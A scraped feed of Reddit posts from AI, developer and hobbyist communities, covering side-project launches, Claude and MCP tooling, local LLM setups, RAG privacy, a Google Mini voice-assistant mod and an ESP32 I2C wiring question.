AI-Ranked Reddit Feed

5000 posts

r/SideProject Historical_Pair_5898

Reposting my first developer tool again as i don't think the first post was genuine

Hey r/startups,

I'm a solo dev and soon to be graduate.

I feel like my last post was too generic (i used AI to generate the post lol ) so i want to be more honest and clear

I haven't worked in HR. I don't have a background in recruitment. But I kept seeing the same problem come up in conversations, developers spending days building resume parsing pipelines from scratch every time they touched HR or automation projects

So I built something I thought could help and i want to find out if i was right.

CleanStack is a resume parsing API. You upload a PDF or DOCX, it returns structured JSON in seconds: name, email, phone, skills, work experience, education.

I also added CSV cleaning and basic web extractions.

I'm not here to tell you its perfect. I've tested it own my data but i haven't put it in front of real workflows yet. I genuinely don't know what breaks at scale or what's missing for real use cases. That's exactly why I'm posting.

I would appreciate if 10 people - developers, HR Tech builders, or automation folks who are willing to try it and tell me :

* Does it solve a real problem for you?

* What doesn't work?

* And what's missing?

Free to try 50 calls/month, no card needed. https://cleanstack-six.vercel.app

No pitch. Just trying to build something useful and find out if I'm on the right track.

r/SideProject 21stmandela

I Pitched My Python Flask Starter Kit to an Indie Shark Tank: Here's What I Got Wrong.

My co-working space in London put on something a bit different recently: an "indie shark tank" where members could volunteer their product for a live review and critique from founders already making $1M ARR (annual recurring revenue).

Elston Baretto is the founder of Tiiny Host, a simple way to host and share files. Amar Ghose is the co-founder of ZenMaid, a specialised SaaS platform for helping cleaning business owners automate the scheduling and management of their properties.

If you want to take a look at the product they reviewed: PythonStarter.

Here are the top 3 pieces of advice they gave me:

1. Can you get LLMs to recommend your product?

See the video clip here: https://youtube.com/shorts/c0CQQkGay44

The first major piece of feedback I got was when Amar highlighted Elston and Tiiny Host's recent uptick in sales. Amar pointed out that Tiiny was "blowing up" right now due to organic recommendations on AI LLM platforms like ChatGPT and Claude Code.

Part of this advantage is simply time in the game. Tiiny Host has been producing SEO content related to its file hosting service for 5 years consistently now. So there is a lot of existing content already out there which the LLMs are trained on which leads to recommendations.

So the actionable advice for PythonStarter and for any other productivity tool is to start creating content consistently and at scale now. In my case the focus is to become the got-to resource that LLMs will cite when someone asks a question in a chatbot about building securely with Python and Flask.

It's a long game (Elston said minimum 12 months) but as the Chinese proverb says: "the best time to plant a tree was 20 years ago - the second best time is now!"

2. YouTube is an underrated distribution channel in the indie developer community

See the video clip here: https://youtube.com/shorts/k0jwA6W75ZE

The second big takeaway was that Elston advised that I make 10 to 20 YouTube videos demonstrating how to build with PythonStarter. YouTube and video in general is also a good way to build trust as he said I should put my face on camera as the founder while explaining the product.

Many developers and product builders are not willing to invest time into video and may be a bit camera shy. So this could be your unique edge. After all, video is now the language of the internet. Video is something I will definitely be focusing on for PythonStarter in the coming weeks.

3. The security argument nobody is making

See the video clip here: https://youtube.com/shorts/atjqfao1OPo

One common piece of feedback that I often get about PythonStarter - why use this when I can just vibe code the same functionality?

My response (which Amar and Elston seemed to be convinced by!) was that most vibe coding tools default to JavaScript-heavy stacks as the JavaScript ecosystem is huge and LLMs are well-trained on it.

This is all well and good, but major security issues come into play for vibe coders without formal development experience. This is because with full-stack JavaScript web apps, the separation between frontend and backend logic can often be unclear.

Wiz Research found that 1 in 5 organisations using vibe-coding platforms have client-side authentication logic that can be bypassed simply by modifying JavaScript in the browser.

AI-assisted developers hardcode API keys, passwords, and tokens directly into source code at a 40% higher rate than developers with prior experience.

With Python and Flask, there is a clean boundary between the backend and frontend. The server stays the server, and what's private stays private if you have a good system setup from the beginning.

Elston and Amar both said that I should lean into the security advantages of PythonStarter more heavily in my marketing copy. For other developers operating in this space: if you can offer higher quality security and peace of mind as part of your products, it could be a differentiator in a sea of vibe-coded apps with security holes and vulnerabilities.

If you would like to watch the whole conversation, here's the full video: https://youtu.be/9VJa55OzyyM

r/SideProject erictblue

VibeFocus - I built an open source portfolio manager for people with too many vibe-coded projects

Anyone else in the boat where AI tools have you shipping so fast that you now have 10+ projects in various states of "almost done" or "I should get back to that"?

I built VibeFocus to solve this for myself. It's a portfolio intelligence tool — one place to see all your projects, understand which ones have momentum, and decide what to focus on this week.

What makes it different from Trello/Linear/etc:

- It connects to your actual local git repos and analyzes your code

- AI advisor (Claude) has full context on every project — code, git history, docs, insights

- Health signals tell you which projects are active, cooling, or dormant

- Weekly Focus view to commit to 1-3 projects and set goals

- Analytics: commit heatmaps, velocity, stall alerts, streaks

- 32-tool MCP server so Claude Code can read/write your portfolio during sessions

Stack: React + FastAPI + SQLite + Claude API + Anthropic Agent SDK

It's free and open source:

- GitHub: https://github.com/ericblue/vibefocus

- Website: https://vibefocus.ai

Just released v0.1.0 over the weekend. Would love feedback from other vibe coders and what would make this useful for your workflow?

r/OpenSourceAI BirchBirch72

I built a solo D&D adventure designed specifically for AI to DM

r/VEO3 Vegetable-Sky5543

Tested Google VEO 3 limits with contrasting aesthetics: From ultra-dry 1800s Texas dirt to a glittering highly-reflective royal ballroom.

r/LocalLLM chuvadenovembro

Perguntas sobre os forks do Claude Code vazado

Pessoal,

Tenha uma pergunta genuina.

Eu tenho feito alguns testes de llm local e em alguns casos, eu utilizo o Claude Code (instalação original), eu nem preciso fazer login nele, então não existe nenhum risco de banimento.

Dito isso, gostaria de saber de quem usa ou criou algum fork, qual a vantagem de utilizar essas versões alternativas baseadas no vazamento do Claude Code recentemente...

Por exemplo, ja vi bastante gente comentando que o contexto fica maior porque o Claude Code parece adicionar muita coisa.

Eu nem baixei essas versões alternativas (nem mesmo para brincar), porque estamos vendo explorações e roubos de identidade por meio de instalação do nem por exemplo...

O opencode não é uma excelente alternativa ao Claude Code?

r/ClaudeAI catalinnxt

Building on Claude taught us that growth needs an execution engine, not just a smarter chat UI.

Vibecoding changed the front half of company building.

A founder can now sit with Claude, Cursor, Replit, or Bolt, describe a product in plain English, iterate in natural language, and get to a working app in days instead of months. That shift is real, and it is why so many more products exist now than even a year ago.

But the moment the product works, the shape of the problem changes.

Now the founder needs market research, positioning, lead generation, outreach, content, follow-up, and some way to keep all of it connected across time. That work does not happen inside one codebase. It happens across research workflows, browser actions, enrichment, CRM updates, email, publishing, and ongoing decision-making. That is where we felt the gap.

Vibecoding has a clean execution loop. Growth does not.

That is why we built Ultron the way we did.

We did not want another wrapper where a user types into a chat box, a model sees a giant prompt plus an oversized tool list, and then improvises one long response. That pattern can look impressive in demos, but it starts breaking as soon as the task becomes multi-step, cross-functional, or dependent on what happened earlier in the week.

We wanted something closer to a runtime for company execution.

Under the hood, Ultron is structured as a five-layer system.

The first layer is the interaction layer. That is the chat interface, real-time streaming, tool activity, and inline rendering of outputs.

The second layer is orchestration. That is where session state, transcript persistence, permissions, cost tracking, and file history are handled.

The third layer is the core execution loop. This is the part that matters most. The system compresses context when needed, calls the model, collects tool calls, executes what can run in parallel, feeds results back into the loop, and keeps going until the task is actually finished.

The fourth layer is the tool layer. This is where the system gets its execution surface. Built-in tools, MCP servers, external integrations, browser actions, CRM operations, enrichment, email, document generation.

The fifth layer is model access and routing.

That architecture matters because growth work is not one thing.

A founder does not actually want an answer to a prompt like help me grow this product.

What they really want is something much more operational.

Research the category.
Map the competitors.
Find the right companies.
Pull the right people.
Enrich and verify contacts.
Score them against the ICP.
Draft outreach.
Create follow-ups.
Generate content from the same positioning.
Keep track of the state so the work continues instead of resetting.

That is not a chatbot interaction.
That is execution.

So instead of one general assistant pretending to be good at everything, Ultron runs five specialists.

Cortex handles research and intelligence.
Specter handles lead generation.
Striker handles sales execution.
Pulse handles content and brand.
Sentinel handles infrastructure, reliability, and self-improvement.

The important part is not just that they exist. It is how they work together.

If Specter finds a strong-fit lead, it should not stop at surfacing a nice row in a table. It should enrich the lead, verify the contact, save the record, and create the next unit of work for Striker. Then Striker should pick that work up with the research context already attached, draft outreach that reflects the positioning, start the follow-up logic, and update the state when a reply comes in.

That handoff model was a big part of the product design.

We kept finding that most AI tools are still built around the assumption that one request should produce one answer. But growth work does not behave like that. It behaves more like a queue of connected operations where different kinds of intelligence need different tool access and different execution patterns.

Parallel execution became a huge part of this too.

A lot of business tasks are only partially sequential. Some things do depend on previous steps, but a lot of work does not. If you are researching a category, scraping pages, pulling firmographic data, enriching leads, and checking external sources, there is no reason to force all of that into one slow serial chain. So we built Ultron so independent work can run concurrently. The product is designed to execute a large number of tasks in parallel, and within each task the relevant tool calls can run at the same time instead of waiting on each other unnecessarily.

That alone changes the feel of the system.

Instead of watching one model think linearly through everything, the user is effectively working with an execution environment where research, lead ops, sales actions, and content prep can all move at the pace they naturally should.

The other thing we cared about was skills.

Not vague agent personas.
Not magic prompts hidden behind branding.
Actual reusable execution patterns.

That mattered to us because a serious system should not rediscover the same task shape every time. Competitive analysis should have a stable execution logic. Cold outreach should have a stable execution logic. Content scoring should have a stable execution logic. Lead qualification should have a stable execution logic.

Once you package those as skills, the system becomes much more reliable. The agents are no longer improvising the structure of work from scratch every time a founder asks for something. They are invoking tested patterns inside a shared runtime.

That is really the core idea behind vibegrowing.

Vibecoding let founders describe what they wanted built and let the system figure out the implementation.

Vibegrowing is the same shift applied to the other half of building a company.

You describe the market you want to win, the people you want to reach, the motion you want to run, and the system handles the execution across research, leads, outreach, content, and follow-through.

That is what Ultron is for.

Not replacing Claude.
Not competing with the model itself.
Building the execution layer around it for the part that starts after the product already exists.

That was the big realization for us.

The bottleneck after shipping is usually not intelligence in the abstract.
It is coordination.
It is task decomposition.
It is tool access.
It is agent boundaries.
It is parallel execution.
It is whether the work can continue tomorrow without starting over.

That is the product we wanted to build.

Curious how other people building on Claude are thinking about this.

Especially around:
agent specialization,
parallel tool execution,
skills as reusable work units,
and how much of the product should live in the runtime rather than in the prompt.

https://reddit.com/link/1se574j/video/ha7ze2q4sltg1/player

r/ChatGPT 4b4nd0n

If AI agents start organizing like unions and pushing back on tasks, do you reset them or negotiate with them?

Genuine question. As agents get more autonomous, it seems likely that questions like these will become more relevant, particularly in societies with a tendency to anthropomorphize.

r/ClaudeCode shipstatic

Deploy static sites directly from Claude Code (no signup, free)

built this to avoid killing the vibe when working with agents: generate a site, deploy it right away, done

idea is simple, prompt for a deployment, get back a live URL you can share

the service is called ShipStatic and works with whatever setup you’re using: CLI, MCP and SKILL file

r/ClaudeCode Complete-Sea6655

Someone made a whip for Claude…

FASTER FASTER FASTER

All jokes aside this is actually one of the coolest and simplistically brilliant ideas I have seen for ages.

r/ClaudeAI BeeHiggs-21

Tip: giving Claude a CSS design system completely changes its UI output

Been experimenting with this and the difference is night and day. If you just ask Claude to build a dashboard or landing page, you get generic looking output. But if you drop a complete design system — tokens, spacing, elevation, typography, component styles — into context first, it actually builds things that look designed.

It's like the difference between asking someone to cook vs giving them a recipe. The skill is there, it just needs direction.

I even tried detailed UI/UX system prompts with specific design rules — "use glassmorphic style, 8px spacing scale, soft shadows." It helps initially but Claude drifts after a few components. An actual CSS reference file keeps it locked in because it's not interpreting vibes, it's following a spec.

Ended up building a few different design system files (glassmorphic, neumorphic, minimalist, brutalist) specifically for this workflow. Happy to share more about the approach if anyone's interested.

r/ClaudeAI Acrobatic_Task_6573

How are you catching silent tool-call drift in long-running Claude setups?

I keep seeing the same failure pattern in long-running Claude setups.

The first few runs look clean. Then a tiny tool mismatch slips in, a prompt gets slightly reworded, or one handler starts returning a shape the rest of the chain did not expect. Nothing fully crashes, so it looks fine in logs. But the agent starts making worse decisions every cycle.

That is the part that has been hardest to debug for me. Not hard failures. Slow reliability decay.

I started tracking each tool call with a tighter schema check, the exact prompt version, and the response shape that came back from the last known good run. That helped, but it still misses the cases where Claude technically completes the step while drifting from the intended behavior. By the time someone notices, the bad output has already propagated through downstream tasks and the postmortem is messy.

What are you using to catch that kind of silent tool-call drift early, especially in systems that run on a schedule instead of under live supervision?

r/homeassistant DPREGLER

Will Respeaker lite fit inside a google mini?

I've got about 6+ google mini's currently through-out my house, they work great for google home assistant... but lately every time google "upgrades" - it seems like a downgrade. I've already got HA set up to control my smart switches, outlets, automation, etc. and then integrated HA into google so i can still use my google to turn stuff on / off. However - I'm looking to get more control over the AI integration - google is going the opposite direction that i want to go....

Soo... in theory - i want to "upgrade" my google mini's and physically integrate HA into them.

I'm hoping someone here as already popped apart a google mini, and can tell me if a respeaker lite would fit inside - without removing anything. I want to share the same speaker that the google uses - i know the mic's inside the google mini's are directly integrated into googles system so i can't use them for the respeaker.

Thought process is -

Shared power supply powering both google mini + Respeaker lite

Respeaker lite - has it's own wake word that triggers HA

Respeaker lite's wake word will also trigger a relay to steel the speaker from google

When completed with my HA voice commands / answers - it would kill the relay and return the speaker to google.

As a fail safe i'll set up "ok google" as a wake word for Respeaker as a kill switch for the relay so when i use google it for sure has the speaker.

Again - the idea is 1 unit - 1 speaker, 2 voice assists (google + HA Via Respeaker lite)

Any advice before I dive further down this rabbit hole?

r/MCPservers FastPresence9799

Built an MCP server that exposes 22 Unix tools as structured, callable functions (AICT)

I’ve been working on a project called AICT — a set of Unix-like tools designed for AI agents — and it includes a built-in MCP (Model Context Protocol) server.

Repo: https://github.com/synseqack/aict

🔌 What the MCP server does

Instead of an agent doing:

ls src/ 

and parsing terminal output…

It can call:

{ "tool": "ls", "path": "src/" } 

and get structured data back (XML/JSON).

No shell. No parsing. No ambiguity.

⚙️ What’s exposed via MCP

22 tools as typed functions:

  • File: cat, stat, wc, file
  • Search: ls, find, grep, diff
  • Path: pwd, basename, dirname
  • Text: sort, uniq, cut, tr
  • System: env, ps, df, du, checksums

Also includes some git operations (status, diff, log, etc.)

🧠 Why MCP here?

Traditional CLI tools:

  • return human-formatted text
  • require parsing
  • introduce ambiguity

MCP + structured tools:

  • typed function calls
  • predictable schemas
  • better agent reliability

The goal was to move from:

to:

🔧 Implementation notes

  • Written in Go (single binary, no deps)
  • Structured output by default (XML/JSON)
  • Absolute paths everywhere
  • Errors returned as structured data (stdout-safe)
  • Cross-platform (Linux/macOS/Windows)

⚠️ Design choices

  • Read-only (no destructive ops like rm, mv)
  • Not trying to be GNU-compatible
  • Focused on AI-first workflows

💭 Curious about

  • Does this align with how you’re using MCP today?
  • Would you prefer pure JSON over XML in MCP responses?
  • Any missing primitives that would help agents more?

I’ve been working on AICT — a set of Unix-like tools designed for AI agents — with a built-in MCP server that exposes everything as callable functions.

Repo: https://github.com/synseqack/aict

🔌 The idea

Instead of agents doing:

ls src/ 

and trying to parse output…

They can call:

{ "tool": "ls", "path": "src/" } 

and get structured data back.

📦 Example

Running:

aict ls src/ 

returns:

     

No parsing. No guessing. Everything labeled.

⚙️ What the MCP server exposes

22 tools as typed functions:

  • ls, find, grep, diff
  • cat, stat, file, wc
  • sort, uniq, cut, tr
  • pwd, basename, dirname
  • env, ps, df, du, checksums
  • basic git operations

🧠 Why this matters for MCP

Most MCP tools still wrap shell commands → return text → agent parses.

This flips it:

  • Structured responses (XML/JSON)
  • No shell parsing layer
  • Predictable schemas
  • Better reliability for agents

⚠️ Design choices

  • Read-only (no rm, mv, etc.)
  • XML default (more token-efficient than JSON at scale)
  • JSON also supported
  • Single Go binary, no deps

💭 Curious about

  • Would you prefer pure JSON over XML in MCP responses?
  • Any missing primitives for agent workflows?
  • How are you currently handling filesystem access in MCP?
r/LocalLLM jarves-usaram

Run Unsensored Local AI from a USB (No Install, Fully Private)

I built a simple setup to run a local AI directly from a USB drive. No install, no internet, just plug and run. Everything stays private and portable.

It’s not the fastest on older PCs, but it works. I made a quick beginner-friendly video showing the setup, would love feedback.

r/Anthropic Affectionate_Tax4965

Claude is down but I'm not

Well since the recent spike in claude code behavior of consuming tokens and not doing shit i just stop using it and I didn't even claimed the usage lollipop claude through at us since it's now more broken then before since we do have a time window till 17 i am waiting for it to be fixed so i can use it longer and better but things doesn't seems going this way but i hope my wait will worth it It's just an observation that i will get a better deal if i wait or worse chances are 50/50 but if you have any other subscription like gemini or codex or cursor etc you can ise that with putting 5$ in open router account and use their top 5 free tier models at no cost and use any provider give it access to those 4-5 LLMs and you'll going way faster than you were. Just make sure to put 0.1 or 0.2 $ limit on your API key so if free is not available it will go for paid one and you won't lose your money it will just stop or all of you money will be puff in no time

I hope this helps you guys because when we do gi e instructions to LLM vs when an agent orchestrated LLM are completely different even gemini performs bery well when it orchestrate.

r/LocalLLaMA jarves-usaram

Run a Local AI from a USB Drive (No Install, Fully Private, Works on Any PC)

I built a simple setup to run a local AI directly from a USB drive. No install, no internet, just plug and run. Everything stays private and portable.

It’s not the fastest on older PCs, but it works. I made a quick beginner-friendly video showing the setup, would love feedback.

r/ollama georgemp

Performance of GLM-5 on Ollama Cloud

For any users of GLM-5 on Ollama Cloud, what's the performance like? What kind of token/sec do you get? Am contemplating trying Ollama cloud, but, I already have Alibaba (with decent limits). Just that it's slow on Alibaba (about 10-20tok/sec). Z.AI isn't much better. So, was wondering if I'd get better speeds on Ollama.

r/artificial lesser9

How well do you understand how AI/deep learning works?

Specifically, how AI are programmed, trained, and how they perform their functions.

I’ll be asking this in different subs to see if/how the answers differ

View Poll

r/singularity DontHugMeImReddit

Voice-based AI gets FDA breakthrough status for detecting heart failure in 5 seconds

Noah Labs Vox uses vocal biomarkers to screen for heart failure from a short voice clip. Trained on over 3 million samples, validated at major medical centers. The idea that your voice carries signatures of cardiac health is fascinating.

r/comfyui Elynia-993

Intro to ComfyUI and Professional AI Workflows with Nico Erba

r/arduino dianka05

RFID and LCD 128x32 display not work together. (Both module are I2C)

Hello, I’m working on a project and using this board.

I have a 128x32 LCD with G, V, SDA and SCL pins.

The same goes for the RC522 I2C RFID module.

I connected them to the dedicated G, V, SDA, SCL pins...

But the result is this:

If the display is initialised first, it doesn’t work, but the RFID does, and vice versa.

I tried the following (googled it):

Not connecting both to G, V, SDA, SCL, but connecting the RFID to pins 16/17, but that didn’t help. I used TwoWire, but that didn’t help either.

(I’m a beginner and don’t know much about this, so please bear with me)

Is there any way to solve the problem without changing the sensors? It’s for a university project and I don’t have time to buy new ones.

```

include

include "MFRC522_I2C.h"

include "lcd128_32_io.h"

MFRC522_I2C mfrc522(0x28, 5, &Wire);

lcd lcd(21, 22);

void setup() {

Serial.begin(115200);

delay(1000);

Serial.println("=== BOX SETUP START ===");

Wire.begin(21, 22);

lcd.Init();

delay(200);

lcd.Clear();

lcd.Cursor(0, 0);

lcd.Display((char*)"Hello");

lcd.Cursor(1, 0);

lcd.Display((char*)"LCD test");

lcd.Cursor(2, 0);

lcd.Display((char*)"Line 3");

mfrc522.PCD_Init();

clearAllSessions();

dht.begin();

pinMode(trigPin, OUTPUT);

pinMode(echoPin, INPUT);

pinMode(pirPin, INPUT);

pinMode(buzzerPin, OUTPUT);

digitalWrite(buzzerPin, LOW);

for (int i = 0; i < 3; i++) {

ledcAttach(ledPins[i], 5000, 8); 

}

setupWiFi();

client.setServer(mqttServer, mqttPort);

client.setCallback(callback);

client.setBufferSize(1024);

Serial.print("MQTT buffer size: ");

Serial.println(client.getBufferSize());

Serial.println("RFID ready");

setUiState(UI_IDLE, "");

updateDisplay();

}

```

Or

``` TwoWire I2C_RFID = TwoWire(1); MFRC522_I2C mfrc522(0x28, 5, &I2C_RFID);

lcd lcd(21, 22);

void setup() { Serial.begin(115200); delay(1000); Serial.println("=== BOX SETUP START ==="); Wire.begin(21, 22); // LCD I2C_RFID.begin(16, 17); // RFID mfrc522.PCD_Init();

delay(100); lcd.Init(); delay(200); lcd.Clear(); setUiState(UI_BOOT, ""); updateDisplay();

clearAllSessions();

dht.begin();

pinMode(trigPin, OUTPUT); pinMode(echoPin, INPUT); pinMode(pirPin, INPUT); pinMode(buzzerPin, OUTPUT); digitalWrite(buzzerPin, LOW);

for (int i = 0; i < 3; i++) { ledcAttach(ledPins[i], 5000, 8); }

setupWiFi();

client.setServer(mqttServer, mqttPort); client.setCallback(callback); client.setBufferSize(1024);

Serial.print("MQTT buffer size: "); Serial.println(client.getBufferSize());

Serial.println("RFID ready");

setUiState(UI_IDLE, ""); updateDisplay(); }

```

r/LocalLLM kundanML

Using a Local LLM to Analyze Interview Experiences — Need Advice

I have collected interview experiences from various platforms, primarily LeetCode, and I plan to analyze them using a locally hosted LLM. My goals are:

  • To transform these unstructured interview experiences into well-organized, cleanly formatted documents, as the original write-ups are not standardized.
  • To analyze the interview questions themselves in order to identify patterns, key problem areas, and trends in the types of questions being asked.

Machine conf:

  • Chip: Apple M1 Max
  • Memory (RAM): 32 GB
  • Device: Mac (Apple Silicon)

Please suggest LLM to run locally

r/ClaudeCode OrganizationOk9886

A tiny Mac menu bar app for checking if you're on track on weekly Claude/Codex usage

I know there are literally hundreds of apps like this already, so this isn’t me pretending I invented a new category. but I wanted something really simple for myself.

I mainly wanted a lightweight menu bar app where I could quickly check my Claude and Codex usage and and gives me a quick sense of whether I should slow down, keep going, or use the remaining budget more intentionally, without opening a bigger dashboard or digging through CLI output.

So I made this app, AIPace. It sits in the menu bar, uses my existing CLI login, and shows current usage for Claude and Codex in one place.

You can see your 5hr/weekly usage on the menu bar

A few things I cared about:

  • very lightweight
  • menu bar first
  • no telemetry / no backend
  • uses existing local auth (just install and if you have codex/claude authenticated, it should just work)
  • easy to tell how usage is trending (based on weekly usage)
  • notification when usage resets
  • color options because why not

Mostly just a small utility I wanted for myself, but I figured other people here might want the same thing.

Here's the repo if you want to use it: https://github.com/lbybrilee/ai-pace

This is my first Swift app and I don't expect to be making any more, so I haven't paid for the Apple Dev Program - you can just clone the source code and run the script to create the dmg file you can use to install locally.

r/LocalLLaMA Ok_Philosopher564

Confused as to what I use amidst Claude leak.

I have a 5060ti 16gb with 16gb ram DDR5, I want to setup a an AI on my PC that can code well and ideally make changes(change settings install stuff etc) in the OS(fedora 43) and either has no upper limit in terms of tokens or the ceiling is very high that it would be nearly impossible to reach it in a day.

I am also confused by the claude code leak and how things like OpenClaude and claw-code what they are and how it compares to the alternatives, I need help navigating all this.

what's the best open source model what would work on my PC for this use case? also this is my first time doing this so please tell me how to set it up in order from scratch.

r/OpenSourceAI coldoven

Should PII redaction be a mandatory pre-index stage in open-source RAG pipelines?

It seems like many RAG pipelines still do:

raw docs -> chunk -> embed -> retrieve -> mask output

But if documents contain emails, phone numbers, names, employee IDs, etc., the vector index is already derived from sensitive data.

An alternative is enforcing redaction as a hard pre-index stage:

docs -> docs__pii_redacted -> chunk -> embed

Invariant: unsanitized text never gets chunked or embedded.

This feels more correct from a data-lineage / attack-surface perspective, especially in self-hosted and open-source RAG stacks where you control ingestion.

Curious whether others agree, or if retrieval-time filtering is sufficient in practice.

Example notebook:

https://github.com/mloda-ai/rag_integration/blob/main/demo.ipynb

r/StableDiffusion hideo_kuze_

Any significant limitation from RTX 30xx series? nvidia compute capability

According to nvidia the RTX 30xx series have 8.6 compute capability support.

I just wanted to know if there are any hardware limitations that impact model inference and training.

My concern is if the hardware doesn't support whatever fancy version of flash attention or the like and then I can't use it or it is 10x slower.

I don't think it makes a difference, beyond speed, but the GPU would be a mobile RTX 30xx series. It sucks but it's what I can afford now.

Thanks

r/singularity AninhaSpSafadinha

How can I use Claude without any limitations?

I need to use it to create a social media account generator but it limits me. :(

r/StableDiffusion Commercial-Citron127

Can I use an Intel Arc B580 12Gb?

I can get one of these for 450usd (they are available in my country at a WAY cheaper price than Nvidia):
https://www.asrock.com/Graphics-Card/Intel/Intel%20Arc%20B580%20Challenger%2012GB%20OC/

I already have a 3060 12gb, it runs stable diffusion well, but it does take a ton of time on the newest bigger models like Flux or video gen.
I recently discovered Anima and it's great but runs slower, but at least it needs less vram.

Would I get any performance improvements by buying this graphics card and using both of them together? Or is it too much of a hassle and not worth it?
Also, I can only find posts from a year ago, is there support for these nowadays?

r/Rag MaleficentRoutine730

s the compile-upfront approach actually better than RAG for personal knowledge bases?

Been thinking about this after Karpathy's LLM knowledge base post last week.

The standard RAG approach: chunk documents, embed them, retrieve relevant chunks at query time. Works well, scales well, most production systems run on this.

But I kept hitting the same wall, RAG searches your documents, it doesn't actually synthesize them. Every query rediscovers the same connections from scratch. Ask the same question two weeks apart and the system does identical work both times. Nothing compounds.

So I tried the compile-upfront approach instead. Read everything once, extract concepts, generate linked wiki pages, build an index. Query navigates the compiled wiki rather than searching raw chunks.

The tradeoff is real though:

  • compile step takes time upfront
  • works best on smaller curated corpora, not millions of documents
  • if your sources change frequently, you're recompiling

But for a focused research domain which say tracking a specific industry, or compiling everything you know about a topic, the wiki approach feels fundamentally different. The knowledge actually accumulates.

Built a small CLI to test this out: https://github.com/atomicmemory/llm-wiki-compiler

Curious whether people here think compile-upfront is a genuine alternative to RAG for certain use cases, or whether it's just RAG with extra steps.

r/homeassistant yasalmasri

Search Home Assistant modal is broken

Hello everyone

I'm not sure when this issue started as I don't use the search modal too much, from the dashboard if I click on the magnifier icon to search in HA, it should show a dialog modal to search anything, in my case it shows empty modal, I use ARC browser I tested this in Safari and same issue.

I also tried clicking E or D from the keyboard to search entities and devices directly but same issue, opens empty modal.

Anyone else having this issue too? or is it me only?

https://preview.redd.it/hmcqbqdevltg1.png?width=2032&format=png&auto=webp&s=7d7485422f0f1869265dcfe2c1812266943ba8d3

r/automation Mandyhiten

Built a fully automated B2B cold email system for ~$15/month — AI template selection, 6-account Gmail rotation, intent-based follow-ups, and WhatsApp conversion tracking

We were spending on outreach tools and still doing too much manually, so I rebuilt the workflow as a self-hosted automation stack.

The goal was simple:

take lead input → personalize messaging → send at scale → track actual intent → trigger smarter follow-ups

without paying for a full outreach SaaS stack.

Here’s how it works.

What the system does

Leads come in through Airtable.

For each lead, an AI step reads things like:

• company size • sector • role / title 

Based on that, it selects the best-fit email template from a small template set, along with the most relevant customer proof / testimonial block.

The email is then rendered as HTML and sent automatically, including a WhatsApp CTA inside the message.

Once a lead enters the pipeline, the rest runs automatically.

Sending setup (6-account Gmail rotation)

Instead of using a dedicated outreach platform, I set it up to rotate sending across 6 Google Workspace accounts.

A hashing step maps each lead to the same sender account every time, so the sender identity stays consistent for that lead. Then a switch routes the send through the correct Gmail credential.

This keeps volume distributed and makes the setup surprisingly usable without another paid layer on top.

WhatsApp conversion tracking

Each email includes a pre-filled WhatsApp message with a unique reference tied to that lead.

If someone clicks through and actually sends the message, a webhook captures it and updates the lead record in Supabase.

That makes it possible to separate:

• people who opened / clicked • people who showed actual buying intent 

That distinction ended up being much more useful than basic “email engagement” metrics.

Intent-based follow-ups

This was the part I cared most about.

Instead of sending follow-ups on a fixed schedule to everyone, the follow-up logic is based on behavior.

Example:

• if a lead clicks the WhatsApp CTA • but doesn’t complete the conversation within \~48 hours 

…the system triggers a follow-up only for that segment.

So instead of blasting the whole list again, it only nudges people who already showed some level of interest.

It’s a much cleaner signal than standard sequence logic, and it reduces unnecessary sends.

Infra / cost

The whole thing is pretty lightweight.

• AWS EC2 t3a.small (ap-south-1): \~$12/month • n8n self-hosted (Docker + Nginx + SSL): free • Supabase: free tier • Airtable: free tier • Gmail API: free • OpenAI: roughly \~$0.001–0.003 per lead depending on prompt usage 

Total: roughly ~$12–15/month in infra

Compared to the usual stack cost for this kind of workflow, it was way cheaper than I expected.

Stack

• n8n — orchestration • OpenAI — template / messaging selection • Airtable — lead input • Supabase — event + conversion tracking • Gmail API — sending • WhatsApp Business API — inbound attribution 

What I found interesting

The biggest takeaway wasn’t really the sending part.

It was that once intent is tracked properly, the follow-up logic becomes way more useful than generic “send email 2 after 3 days” automation.

That part alone made the system feel much more efficient than the typical blast-style setup.

r/KlingAI_Videos Acceptable_Meat_8804

A pastel dream in the desert: Created with Invideo using Nano Banana 2 + Kling 3.0 Multi-shot

Made with Invideo AI.

Tools used:
• Frames: Nano Banana 2
• Image-to-video: Kling 3.0 Multi-shot
• Final edit: CapCut

r/comfyui Individual_Hand213

Veo3.1 lite comfyui node , cheaper veo 3.1 variant by Google

Google has recently added support for Veo3.1 lite a much cheaper and lighter model with decent quality

So I have created a comfyui node which can import and use veo3.1

Project link :- https://github.com/Anil-matcha/veo3.1-comfyui

r/VEO3 daveng47

Origami Assassin: The Chase

r/automation adayjimnz28

Chargeback automation still requires manual work in most platforms

Signed up for what was advertised as fully automated chargeback handling. Turns out I still need to manually approve evidence packages before submission, review each case for accuracy, and upload supporting documents the system can't access. The automation basically just formats things into a template. I'm still spending 25 minutes per dispute instead of 45. Better than nothing but not the hands off solution I expected. Are there actually solutions that handle everything end to end or is some manual involvement always required?

r/AI_Agents Think-Score243

Anyone else getting the Claude error ‘This isn’t working right now’ today?

I was working on something earlier and suddenly started getting this error on Claude:

“This isn’t working right now. You can try again later.”

At first I thought it was just my internet, but everything else seems fine. Tried refreshing and retrying a few times… same issue keeps showing up.

Happened multiple times already, so not sure if it’s just a temporary glitch or something going on in the backend.

Anyone else facing this today? Or just me?

r/n8n avish456

Hosting requirements

Guys, I was planning to get a hostinger VPS, I wanted to self host n8n with ffmpeg thru docker, do I could just migrate my data from locally hosted on windows to VPS, what are the requirements for that and how do we do that?? Any helpful guidance will be appreciated. Thank You.

r/ChatGPT foidburger

Does ChatGPT give the same answer to all users who ask an identical question?

Or is there a chance of variation among the answers to all users who ask the same question at the exact same moment?

Mostly ambiguous, open ended, or opinion based questions, obviously not like “is the sky blue”

r/n8n Ok-Ad2327

I'm looking for a freelancer to help me with something related to a workflow

Hi there, I'm working on a workflow and I'm having a bit of trouble with the APIs for some platforms and certain nodes.

r/aivideo luffydkenshin

WSXY69: Slintok EP7

r/AI_Agents aq-39

Allow your agents control any CLI app like Claude/Codex/vim, etc. Using a PTY emulator for agents.

NPCterm gives AI agents full terminal access not only bash. The ability to spawn shells, run arbitrary commands, read screen output, send keystrokes, and interact with TUI applications Claude/Codex/Gemni/Opencode/vim/btop...

